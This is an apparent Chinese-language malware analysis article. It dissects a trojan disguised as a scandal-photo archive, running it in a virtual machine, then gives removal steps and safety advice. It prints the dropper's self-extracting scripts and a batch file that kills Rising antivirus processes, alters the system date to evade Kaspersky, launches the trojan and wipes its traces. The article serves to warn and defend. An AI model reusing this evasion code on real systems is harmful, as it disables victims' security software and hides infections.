虚拟机系统:windows xp2
下载软件:迅雷
杀毒软件:瑞星2008(打了最新补丁包)
一、中招过程
朋友好奇,寻找艳照门图片。在百度某贴吧中看到一条信息,提供艳照下载,并且给出了链接地址“http://guilin123.*.com/yanmenzhao.rar”于是迫不及待地用迅雷下载,下载的过程中“迅雷安全中心”弹出病毒威胁警告对话框,由于是测试忽略,点击“继续下载”。(图1)
为了测试,笔者的迅雷设置了“下载完成后杀毒”。下载完成后,瑞星病毒扫描后提示“发现2个病毒,清除失败!”(图2)
二、病毒分析
下载完成的这个名称为yanmenzhao,大小为1.04M文件是个压缩文件,后缀为rar。右键单击选择“解压到yanmenzhao下”,解压后为yanmenzhao.exe,其后缀为exe,这是个自动解压文件,估计攻击者一定在其中做了文章。(图3)
这时千万不能直接双击打开,打开后一定会运行自解压脚本就会中招。先打开WinRAR压缩软件,然后通过“文件”→“打开压缩文件”来打开yuanmenzhao.exe,果然在其下有两个文件:艳门照.rar、ymz.exe。第一个文件应该就是图片压缩包,而第二个就是木马压缩文件。同时在WinRAR的右侧窗格中发现如下代码:(图4)
Path=%systemroot% Setup=ymz.exe Presetup=艳门照.rar Silent=1 Overwrite=1 |
解释如下:
第一行是文件的解压路径,在系统根目录下;
第二页是解压后自动运行ymz.exe;
第三行是在解压之前先解压艳门照.rar,达到掩人耳目,看不到ymz.exe文件,其实它已经运行了;
第四行是隐藏文件,达到更隐蔽;
第五行是覆盖目录下的同名文件,以容错更可靠。
用同样的方法在WinRAR中解压ymz.exe,发现下面5个文件:(图5)
1.bat 1.exe 1.vbs knlps.exe knlps.sys |
同样在右边有自解压脚本代码:
Path=%systemroot%\temp SavePath Setup=1.vbs Silent=1 Overwrite=1 |
原理好上面的一样,只不过是解压到系统临时目录下。
用记事本打开1.vbs分析,代码如下:
CreateObject("WScript.Shell").Run "cmd /c 1.bat",0 |
很明显,是调用1.bat文件。
用记事本打开1.bat文件,代码及其解释如下:
@ECHO OFF knlps.exe -l >PID.txt FINDSTR /i "RavMon.exe" PID.TXT >>RAV.txt FINDSTR /i "RavMonD.exe" PID.TXT >>RAV.txt FINDSTR /i "CCenter.exe" PID.TXT >>RAV.txt FOR /F "eol=; tokens=1 delims= " %%1 in (RAV.txt) do knlps.exe -k %%1 |
上述代码是获取瑞星组件的进程ID并通过knlps.exe结束瑞星的进程。
set date=%date% date 1990-01-01 date 1990-01-01 |
上述代码是修改系统时间使卡巴监控失效,这句是关键破卡巴查杀的程序流,没这句被杀木马就会被杀。
@echo off & setlocal enableextensions echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs set /a i = 15 :Timeout if %i% == 0 goto Next setlocal set /a i = %i% - 1 cscript //nologo %temp%.\tmp$$$.vbs goto Timeout goto End |
上述代码是倒计时等待15秒
:Next
%systemroot%\temp\1.exe 这个是你木马的名称
for %%f in (%temp%.\tmp$$$.vbs*) do del %%f
上述代码第二回行就木马名称的解压目录,第三行行是倒计时等待结束后运行木马并删除。
date 2007-10-27 aaa date %date% aaa |
上述代码是恢复系统时间(卡巴监控)
RD /S /Q %systemroot%\temp\ |
上述代码的含义是删除临时文件清除痕迹。
从上面的分析可以看出该自解压包木马的运行机制是,先通过脚本终结瑞星和卡巴斯基,然后运行真正的木马程序,即1.exe,最后清除痕迹。
三、运行病毒
1、瑞星被终结
分析完毕,然后双击yanmenzhao.exe看看中毒症状。为了分析病毒的运行状况,事先打开了瑞星的“实时监控”和“任务管理器”,以观察病毒运行状态。运行后瑞星没有任何提示,任务栏中的瑞星实时监控图标消失,看来瑞星被终结了。另外,在任务管理中出现了一个cscript.exe进程见图6,很快地闪动,鼠标无法选择结束,大概几秒钟后该进程消失,在进程管理器中有多了2个svchost.exe进程见图7。(笔者在测试前备份了进程表,以前的为5个,多了2个)(图6)(图7)
2、可疑的网络连接
在命令提示符下敲入命令:
netstat -ano |
查看网络端口连接情况,果然发现了两个可疑IP地址的端口连接:(图8)
TCP 192.168.131.72:1098 116.20.215.181:8008 ESTABLISHED 1916 TCP 192.168.131.72:1099 116.20.215.181:2630 ESTABLISHED 424 |
这两个连接正好是刚才创建的两个svchost.exe进程创建的。其中的IP 116.20.215.181应该是攻击者的IP或者是一个中转IP。打开www.ip138.com查询,得知是广东省佛山市电信。(图9)
四、清除病毒
1、结束进程
在结束进程的发现这两个svchost.exe进程之间互相保护,当结束了其中的一个,另一个马上会重新新建一个。因此手工结束速度太慢,通过批处理命令来清除:
把如下代码保存为kill.bat,双击即可。
@echo off taskkill /f /pid 1916 taskkill /f /pid 424 exit |
提示:其中的pid是随机的,一定要找到可疑的svchost.exe进程的pid,如果结束了系统启动的svchost.exe的话,系统就会关机或者重启。确定的方法,可以参考图8。
2、删除服务
运行services.msc打开“服务”工具,通过分析发现了一个可疑的服务项。
服务名称为:Workstain
显示名称:qmijiu
描述:Wicrosoft .NET Framework TPM
可执行文件路径:c:\WINDOWS\system32\svchost.exe -k Workstain
启动类型:自动
服务状态:已启动
评析:该服务项和Workstation非常相似,并且描述极具欺骗性,攻击者非常狡猾。(图10)
提示:在禁用服务的过程中发现,如果不先结束两个svchost.exe进程,发现根本无法禁用,当你选择禁用该服务,点击确定,它马上改为“自动”运行,可见这也是进程保护在作怪。因此必须把两个进程结束掉再禁止服务。最彻底的是用命令把该服务删除,命令为:
sc delete qmijiu |
3、文件删除
(1)C:\WINDOWS目录下的(图11)
艳门照.rar
ymz.exe
(1)C:\WINDOWS\system32目录下的(图12)
Workstain.drv
Sharing.dll
总结:该木马病毒利用大众的猎奇心理,把木马和图片打包在一起,然后通过WinRAR的自解压功能使得木马得以运行。其原理比较简单,但象朋友这样的人却屡屡中招。这例“艳照门”木马病毒给我们的启示是:
1、做好自律,不去猎奇浏览不雅的东西;
2、在系统中要设置显示文件的后缀,这样可以通过文件后缀就可以判断文件的类型。
3、对自解压文件要非常小心,千万不要直接打开,应该选择用winRAR软件打开,看看有没有可疑的脚本和程序。总之,在思想上和技术上都做好准备,不要成为“艳照门”木马病毒的下一个受害者。